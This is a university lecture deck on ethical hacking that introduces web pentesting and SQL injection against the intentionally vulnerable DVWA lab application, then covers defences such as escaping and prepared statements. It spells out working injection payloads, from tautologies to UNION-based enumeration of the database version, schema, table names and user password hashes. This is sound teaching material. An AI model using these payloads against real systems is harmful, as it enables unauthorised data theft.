INFO3002 Ethical Hacking Principles and Practice

Lecture 10: Web Pentesting Overview, SQL Injection

School of Computer, Data and Mathematical Sciences

Western Sydney University
1
Lecture outline
After looking at the five stages of pentesting,
we study the pentesting on a particular type of
applications - Web Applications.

■ Top Web Vulnerabilities

■ The intentionally vulnerable web applications as targets
■ SQL Injection
■ Defence against SQL Injection

2
Web Applications
■ Web applications are a necessity today.
▬ Search engine
▬ Online shopping, banking
▬ News portal
▬ Online social networks, etc.

■ The security of web applications is a critical issue.

3
Top Vulns in Web Applications
■ The renowned Open Web Application Security Project
(OWASP) Top 10 project aims to survey industry to obtain
the 10 most critical risks in web.
▬ URL: https://owasp.org/www-project-top-ten/
▬ The past releases of Top 10 occurred in 2004, 2007, 2010, 2013,
2017 and 2021 respectively.

■ The results of Top 10 risks in 2017 and 2021 are shown in

the next slide

4
OWASP Top 10 Web Security Risks
From 2017 to 2021, the following changes happen in the Top 10: three new categories
added, four categories with name and scope changed, and some consolidations.

5
The three vulns from Top 10 to discuss
■ In this subject, we'll discuss the pentesting of the following 3
vulns from the Top 10 in both 2017 and 2021:
▬ Injection: Injecting malicious commands into website through user
input
o The injected commands can be SQL, OS shell, Xpath, etc.
o SQL injection is the most common among injection attacks.
▬ Broken Access Control: Stealing cookies to bypass authentication,
etc.
▬ Cross Site Scripting (XSS): Attackers exploit flawed web applications
to inject malicious Javascript to browsers.
o This belongs to injection as well.

6
Lecture outline
■ Web Vulnerability Overview
■ The intentionally vulnerable web applications as targets
■ SQL Injection
■ Defence to SQL Injection

7
Target Web Applications for Pentesting
■ There are several intentionally vulnerable web applications
installed on Metasploitable2.
▬ Mutillidae
▬ DVWA (Damn Vulnerable Web Application)
▬ phpMyAdmin
▬ TWiki
▬ dav (WebDav)

■ They are installed in the /var/www directory

8
Target Web Applications (cont'd)
■ On Kali, start Firefox, enter http://<IP address of Metasploitable2>, you'll
see:
▬ NB: Don't use 'https' here, which will make the pentesting hard.

Then, you can click a link to interact

with a vulnerable web application.

9
DVWA – The chosen target for this unit
■ Damn Vulnerable Web Application (DVWA) is a
PHP/MySQL web application that is damn vulnerable.
▬ Website: https://github.com/ethicalhack3r/DVWA

■ The version installed on Metasploitable2 is V1.0.7.

▬ We will use this version, as it is easy for learning.

■ Its latest version is much more complicated, thus not

adopted in Metasploitable2.

10
Three Security Levels in DVWA
■ To help you understand how to develop secure web
applications, DVWA has three security levels.
▬ High – This level is to give an example of good coding practice. This
level aims to be secure against known vulnerabilities.
▬ Medium – This level is to give an example where the developer has
tried but failed to fully secure an application.
▬ Low - This level has no security consideration at all.

■ By default, the security level is set to high. However, we

need to switch it to low in this subject such that we can
experiment with our web pentesting tools.

11
PHP-IDS in DVWA
■ PHP-IDS (PHP Intrusion Detection System) is a software
package that can filter user input against a blacklist of
potentially malicious code.
■ PHP-IDS is installed in DVWA, but it is disabled by
default.
■ We will not study PHP-IDS in this unit, so you should keep
it disabled, i.e., untouched.

12
DVWA Usage
■ The default username and password to access DVWA is
admin:password.
■ When you enter username and password, Firefox will
prompt you that the connection is not secure, but you
should still go ahead.
■ After logging in, you should see an interface shown in the
next slide.

13
DVWA Usage – Interface

Links to Web pages containing

web vulnerabilities. Click a
link to play with a vuln.

Shows current username and security level

14
DVWA Usage – Change Security Level
■ The 'DVWA Security' button allows you to change the security
level of the website.
▬ The first thing you do is to change the level to 'Low' and then 'Submit'
before pentesting.

15
DVWA Usage – Reset Database
■ During your pentesting, the 'Setup' button allows you to
reset the database used by DVWA in case you damage it.
▬ You don't need to set up the database when you run the DVWA
website for the first time. It's already set up for you.

16
DVWA Source Code Overview
■ You are required to understand the basic source code of
DVWA.
■ The code for each vulnerable web page is in the following
directory: /var/www/dvwa/vulnerabilities/

For instance, the 'sqli' folder contains the php files for
the SQL injection vuln, and the 'xss_r' folder the Reflected
XSS vuln, and the 'xss_s' folder the Stored XSS vuln, etc.

17
 DVWA Source Code for Each Vuln
■ If you ‘cd’ the folder for a vuln, say ‘sqli’, you will see that it
contains an ‘index.php’, a ‘source’ folder, and a ‘help’ folder.

■ The ‘index.php' is the first page to load.

■ The ‘source' folder contains the php files for the implementations
of the three security levels
■ The ‘help’ folder contains only one file: ‘help.php’, which will
display help info on this vuln.
18
The ‘index.php’ for each vuln

Load the php for

different security
level based on the
cookie value, which
is set when you
selected the
security level.

19
View DVWA Source Code

Besides viewing source by opening files, you can also

click the 'View Source' button at any web page to see
its source code.

In addition, you can click the 'View Help' button to

get hints on the vuln. The hints are displayed by the
‘help.php’ mentioned before.

20
Compare code of different security levels

When viewing source, you can further click the

'Compare' button to display the source codes of all
three security levels to see their differences.
21
Lecture outline
■ Web Vulnerability Overview
■ Target vulnerable web applications
■ SQL Injection
■ Defence to SQL Injection

22
SQL Injection
■ SQL Injection (SQLI) means to insert malicious code into
SQL commands executed by web server through user
input.
▬ Note: MySQLi means MySQL Improved, which is a set of improved
PHP functions for accessing MySQL database. So MySQLi and
SQLI refer to completely different things.

■ Next, we will use the ‘SQL Injection’ page in DVWA to give

an SQLI example.

23
 Remember to Change Security Level to
'Low'
■ The first thing you do is to change the level to 'Low' and then
'Submit' before pentesting.

24
SQLI in DVWA

Click ‘SQL Injection’, you’ll see this page.

Click ‘View Source’, you’ll see the user input will

be used to compose the following SQL statement:
$getid = "SELECT first_name, last_name FROM
users WHERE user_id = '$id'";

Click ‘View Help’, you’ll know the valid user IDs are
‘1’, ‘2’, …, ‘5’ in the database.

25
SQLI − Valid Input
■ Let’s try the valid input ‘1’ and then submit. The resulting SQL
statement will be:
▬ SELECT first_name, last_name FROM users WHERE user_id = '1'

■ You’ll be returned the first name and surname of the user with ID ‘1’
correctly.

26
SQLI to disclose all records
■ Enter the crafted input random' or '0'='0. Then, the resulting
SQL will be:
▬ SELECT first_name, last_name FROM users WHERE user_id='random' or
'0'='0'
▬ Note: '0'='0' will be true, such that the entire WHERE clause is true,
thus returning all records.

27
SQLI to disclose all records (cntd)
■ Then, you'll be returned all 5 records in the 'user' table below. (NB: the ID
field shows your actual input.)

28
SQLI to disclose DB server version
■ Enter the crafted input random' or '0'='0' union select null, version()
#. The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE user_id='random'
or '0'='0' union select null, version() #'

■ Notes:
▬ 'SELECT' and 'select' are the same in SQL.
▬ 'union' is an SQL operator to combine the results of two 'select' statements.
o Condition: both 'select' statements must select the same number of columns. The
'null' can be used to generate a dummy column.

▬ '#' introduces a comment until the end of a line in MySQL. It is used here to
comment out the last single quote, otherwise there will be a syntax error.
▬ 'version()' is a MySQL function to return the version of the MySQL server.

29
SQLI to disclose server version (cntd)
■ Then, the MySQL server version is displayed in the last line.

30
SQLI to disclose username for DB
access
■ Enter the crafted input random' and 1=0 union select null,
user() #. The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' and 1=0 union select null, user() #'

■ Notes:
▬ 1=0 will return false, so the first select statement will return nothing. This
is an improvement over the previous SQLI: removing the info we do not
want.
o '1'='0' can also be used here, returning false as well.
o With quotes, SQL compares strings; without quotes, SQL compares numbers.
▬ 'user()' is a MySQL function to return the username and the hostname of
the DB server for accessing the DB.

31
SQLI to disclose username for DB
access (cntd)
■ The username 'root' and hostname 'localhost' are displayed in
the last line:

32
SQLI to disclose database name
■ Enter the crafted input random' union select null, database()
#. The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' union select null, database() #'

■ Notes:
▬ user_id='random' will most likely return false, so the first select
statement will return nothing. This further simplifies the previous SQLI
▬ 'database()' is a MySQL function to return the database name accessed
by the current database connection.

33
SQLI to disclose database name (cntd)
■ The database name 'dvwa' is displayed in the last line:

34
SQLI to disclose table name
■ Enter the crafted input random' union select null, table_name
from information_schema.tables where table_name like
'user%' #. The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' union select null, table_name from
information_schema.tables where table_name like 'user%' #'

■ Notes:
▬ 'information_schema' is a built-in database in MySQL, storing general
info about all databases managed by MySQL.
▬ The 'tables' table in 'information_schema' stores all table names in all
databases.
▬ In reality, a hacker doesn't know the table name is 'users' when he/she
plays with this 'User ID' interface. So here he/she guesses that the table
name starts with 'user'.
35
SQLI to disclose table name (cntd)
■ All such table names are returned after 'Surname' below.

■ Hackers will need to do further work to determine the name is 'users'. We

will omit this step here.

36
SQLI to disclose column names in
'users' table
■ Enter the crafted input random' union select table_name,
column_name from information_schema.columns where
table_name='users' #. The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' union select table_name, column_name from
information_schema.columns where table_name='users' #'

■ Notes:
▬ The 'columns' table in 'information_schema' database stores all column
names of all tables of all databases managed by MySQL.
▬ The above statement will return all column names in 'users' table.

37
SQLI to disclose column names in
'users' table (cntd)
■ The column names are displayed after 'Surname', while the table name
'users' is displayed after 'First name'.

38
SQLI to disclose all usernames and
password hashes in 'users' table
■ Enter the crafted input random' union select user, password
from users #. The resulting SQL will be:
▬ SELECT first_name, last_name FROM users WHERE
user_id='random' union select user, password from users #'

■ Notes:
▬ From the outputs in the previous slide, hackers can guess that the field
containing username is called 'user' and the field containing password is
called 'password'
▬ So hackers will use the above SQL statement.

39
SQLI to disclose all usernames and
password hashes 'users' table (cntd)
■ The usernames are displayed after 'First name', while the password hashes
are displayed after 'Surname'.

Then, hackers
can use password
cracking tools
to try to
recover the
passwords!

40
Notes on password cracking tools
■ Popular password cracking tools include:
▬ Cain and Abel
▬ John the ripper
▬ Aircrack-ng, and much more

■ This unit will not cover the details of password cracking.

However, it will be covered by other security-related units
offered by our school such as Computer Security, Network
Security, etc.

41
Summary to SQLI techniques
■ Use '0'='0' or 0=0 to generate always true condition.
■ Use union to combine two select statements, in which the
latter one displays what you want.
▬ The two statements must select the same number of columns. To
achieve this, you can use 'null' to generate dummy columns

■ Remember the MySQL functions such as version(), user(),

etc. for returning database information.
■ Use comment characters such as # to comment out the
code that causes syntax errors.

42
A complete list of commenting
syntaxes supported in MySQL
■ From the # character to the end of the line
■ From double dash -- to the end of the line.
▬ It is required that the second dash should be followed by at least
one whitespace or control character (such as a tab, etc.).

■ From /* to the following */, allowing multiple lines.

In previous examples, we only used '#'. You can use

other supported commenting syntaxes as well.

43
Automated SQLI tools
■ Besides conducting SQLI manually, you can also use
automated SQLI tools such as SQLMAP, w3af, etc.
■ The most notable one is SQLMAP, which can automatically
detect and exploit SQLI flaws and even gain admin access
to database servers.
▬ A very cool tool.
▬ Website: https://sqlmap.org

■ Although the automatic tools are very powerful, the manual

SQLI remains the most effective way to exploit SQLI vulns.

44
Lecture outline
■ Web Vulnerability Overview
■ Target vulnerable web applications
■ SQL Injection
■ Defence to SQL Injection

45
Guidelines to SQLI Defence
■ Grant the least privileges needed to each database account
■ In web app, use an appropriate account to access
database.
▬ E.g., DVWA shouldn't use the account 'root' to access DB.

■ Always sanitize users’ inputs.

▬ Validate users’ inputs according to requirements
o type, syntax, etc.
▬ Escape ', ", and some other special characters by calling the
mysqli_real_escape_string() function
■ Set the semantics of the SQL query by using Prepared
Statement
▬ This is the most effective method, but not required in this subject.
46
Source code of high.php for SQLI
Remove the backslash from a string

Escape the following characters: ',

", ASCII 0, \n, \r, \, and Cntl-Z.

■ Note: The DVWA is a little old. The 'mysql_' set of PHP functions
are deprecated, so you should use the corresponding 'mysqli_'
function today.
▬ E.g., mysql_real_escape_string() should be replaced by
mysqli_real_escape_string() today.
▬ Both functions will add the escape character \ before these seven special
chars such that they lose their syntactic meanings.

47
Source code of high.php for SQLI (cntd)
■ First, the stripslashes() removes the backslashes.
▬ NB: it will NOT remove forward slashes.

■ Then, the mysqli_real_escape_string() adds the backslashes

to escape special characters.
▬ E.g., ' becomes \', " becomes \", etc., such that they lose their syntax
meanings in SQL statements.
▬ Only the following seven characters ', ", ASCII 0, \n, \r, \, and Cntl-Z will
be escaped.
▬ These special characters will not be removed, because they need to be
stored in the database in many scenarios
o E.g., the database may need to store a paragraph of text, which can contain
quotes and newline characters, etc.

48
Source code of high.php for SQLI (cntd)
■ The stripslashes() manual & example:
▬ https://www.w3schools.com/php/func_string_stripslashes.asp

■ The mysqli_real_escape_string() manual & example:

▬ https://www.w3schools.com/php/func_mysqli_real_escape_string.asp

49
Examples of using stripslashes( ) and
mysqli_real_escape_string( )
■ Suppose the PHP variable $str_x contains:
He /is/ \"humorous\".
The output of stripslashes($str_x) will be:
He /is/ "humorous".
■ Suppose the PHP variable $str_y contains:
He 'is' "humorous"!.
The output of mysqli_real_escape_string($str_y) will be:
He \'is\' \"humorous\"!.

50
Example Short Answer Question:
■ What are the Top 3 web security risks released by
OWASP in 2021?

51
Lecture Summary
■ Attacks on web applications are very common today due
to the prevalence of web applications.
■ SQL Injection is a major type of attacks on web
applications.
■ SQL Injection attacks can be prevented if web
applications sanitize user inputs properly.

52
References
■ Manual SQLI:
▬ https://www.computersecuritystudent.com/SECURITY_TOOLS/DVW
A/DVWAv107/lesson6/index.html

■ The web links mentioned in the slides of this lecture

Big reminder:
• Lab 9 will be due next week. Please start it
asap!

53